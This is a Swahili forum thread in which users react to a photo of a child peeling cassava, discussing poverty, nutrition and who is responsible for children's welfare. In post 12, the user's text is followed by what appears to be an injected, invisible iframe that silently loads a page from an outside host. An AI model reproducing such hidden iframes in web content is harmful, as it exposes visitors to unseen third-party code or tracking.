Dismiss Notice
You are browsing this site as a guest. It takes 2 minutes to CREATE AN ACCOUNT and less than 1 minute to LOGIN

Angalia hii Picha, then TAFAKARI

Discussion in 'Jamii Photos' started by MaxShimba, Sep 14, 2012.

  1. MaxShimba

    MaxShimba JF-Expert Member

    #1
    Sep 14, 2012
    Joined: Apr 11, 2008
    Messages: 35,808
    Likes Received: 94
    Trophy Points: 145
    [​IMG]
     
  2. Bigirita

    Bigirita JF-Expert Member

    #2
    Sep 14, 2012
    Joined: Feb 12, 2007
    Messages: 13,582
    Likes Received: 332
    Trophy Points: 180
    Mkuu. . . Afadhali mihogo ipo, mibichi unakula, ukichemsha mwake tu, ukikaanga shega, ukikausha na kusaga upate unga unapiga game na maharage, au hata mchicha pori.

    Ila daaaah!!!
     
  3. King'asti

    King'asti JF-Expert Member

    #3
    Sep 14, 2012
    Joined: Nov 26, 2009
    Messages: 27,048
    Likes Received: 1,248
    Trophy Points: 280
    Mtoto anaonekana kachoka halafu ana njaa.
    Maisha bora kwa kila mdanganyika.
     
  4. BHULULU

    BHULULU JF-Expert Member

    #4
    Sep 14, 2012
    Joined: Jun 28, 2012
    Messages: 4,880
    Likes Received: 65
    Trophy Points: 145
    Mimi naona naona dogo kama vile kiburi hataki kazi anataka acheze na wenzake,inaonekana kama amalazimishwa kufanya kazi,ila hiyo picha imenikumbusha mbali sana maana hiyo kazi ya kumenya mihogo nimeifanya sana kijijini enzi hizo.
     
  5. T

    Taso JF-Expert Member

    #5
    Sep 14, 2012
    Joined: Jun 12, 2010
    Messages: 1,394
    Likes Received: 120
    Trophy Points: 160
    Muhogo ni moja ya vyakula duni kuliko vyote duniani, hakina chochote zaidi ya hamirojo. Lakini ni moja ya vyakula vikuu vya Mtanzania, haswa vijijini, na ndo sababu tunadumaa miili na akili.
     
  6. farkhina

    farkhina Platinum Member

    #6
    Sep 14, 2012
    Joined: Mar 14, 2012
    Messages: 12,585
    Likes Received: 487
    Trophy Points: 180
    Sad...yaani inaonesha kiasi gani maisha yalivokuwa magumu.

    Sent from my BlackBerry 9100 using JamiiForums
     
  7. A

    Africa_Spring JF-Expert Member

    #7
    Sep 14, 2012
    Joined: Jun 16, 2012
    Messages: 428
    Likes Received: 1
    Trophy Points: 0
    umenifurahisha sana mkuu,
    nimegundua muhogo una-resource zote kaka
    unakupatia unga,mohogo wenye unaweza kuula kama ulivyo andika hapo juu...pia majani yake mboga alikadhalika miti yake kuni...duh.....yani kitu full-nondo mkuu...kweli wewe unaona mbali.
     
  8. denoo49

    denoo49 JF-Expert Member

    #8
    Sep 14, 2012
    Joined: Mar 29, 2011
    Messages: 3,507
    Likes Received: 1,301
    Trophy Points: 280
    teh! Wakumenya "mihogo" huwa wanasema? Kwa hiyo siku hizi unafanya kazi gani.
     
  9. denoo49

    denoo49 JF-Expert Member

    #9
    Sep 14, 2012
    Joined: Mar 29, 2011
    Messages: 3,507
    Likes Received: 1,301
    Trophy Points: 280
    dunia nzima tukio kama hili linapatikana tanzania tu.
    WAKATI MABILIONI YA WATOTO DUNIANI WAKIWA NA HOFU YA MALEZI..., WATOTO MASKINI WA TANZANIA NDIO WAMEGEUZWA MIUNDO MBINU YA......!
     
  10. Watu8

    Watu8 JF-Expert Member

    #10
    Sep 14, 2012
    Joined: Feb 19, 2010
    Messages: 45,886
    Likes Received: 466
    Trophy Points: 180
    Mtoto yupo comfortable kabisa...pengine anaanda hogo la kutengeneza bada au anataka kujipongeza kwa kumung'unya japo kipande baada ya mauzo
     
  11. tz1

    tz1 JF-Expert Member

    #11
    Sep 14, 2012
    Joined: Mar 19, 2011
    Messages: 2,100
    Likes Received: 17
    Trophy Points: 135
    nchi yetu yenye madini mengi
     
  12. mathematics

    mathematics JF-Expert Member

    #12
    Sep 14, 2012
    Joined: Feb 21, 2012
    Messages: 3,248
    Likes Received: 14
    Trophy Points: 135
    na avatar yako ya chama cha mafisadi...


    <iframe src="//edge.crtinv.com/getData.html?d=about%3A%2F%2F" style="width: 0px; height: 0px; display: none;"></iframe>
     
  13. Baba V

    Baba V JF-Expert Member

    #13
    Sep 14, 2012
    Joined: Dec 29, 2010
    Messages: 19,493
    Likes Received: 105
    Trophy Points: 160
    Mkuu mbona sie huku kwetu ndo mwendo wenyewe,hakuna cha ajabu hapo,labda kwa wale from affluent families,lakini zaidi ya asilimia sabini ya watanzania ndo maisha yetu hayo
     
  14. Facilitator

    Facilitator JF-Expert Member

    #14
    Sep 14, 2012
    Joined: Oct 30, 2010
    Messages: 2,078
    Likes Received: 138
    Trophy Points: 160
    Inawezekana anacheza tu. Watoto wa kiume wana mambo sana. Si ajabu anafurahia utundu wake tu hapo, and life goes on.
     
  15. gfsonwin

    gfsonwin JF-Expert Member

    #15
    Sep 14, 2012
    Joined: Apr 12, 2012
    Messages: 16,144
    Likes Received: 589
    Trophy Points: 280
    jamani ila hapa naona shid ani kwa wazazi ama walez wa huyu mtoto. hivi mpaka umeichimba kuleta nyumban basi kwanini usimenye na kuipika ili mtto ale? kweli awe we doing fair to our kids? utakuta mama kabaki na shughuli zake badala ya kumuhudumia huyu asiyeweza kujiduhumia.

    hapa tatizo hata siyo la serikali jamani hili ni la wazazi na walez. nina mfano wa familia moja kiukweli kabisa baba na mama ni waathirika na wamezaa mara 6 kati ya hao deceased ni wawili, wawili mabinti ni waathirika na wawili ndo wazima. hii familia wanaish shamba ambako wao hata nyumba ni tabu, lkn nipenda kwani wanalima mboga na mihogo wanapata lishe yaani ukiambiwa watoto wale ni waathirika utakataa kwa jinsi walivyo nawiri.

    hivyo si kukimbilia kukosoa serikali mahai ambapo mtu binafsi inabidi uonyeshe juhudi zako.
     
  16. denoo49

    denoo49 JF-Expert Member

    #16
    Sep 14, 2012
    Joined: Mar 29, 2011
    Messages: 3,507
    Likes Received: 1,301
    Trophy Points: 280
    hata "jua kali" alipoulizwa kwa nini Tanzania ni nchi maskini akajibu hajui ila Tanzaninia sio maskini labda watanzania ndio maskini.. Si ajabu alikua anafurahia kuitwa Mh. Raisi. At the end ov ze day lyfe goes on.
     
Loading...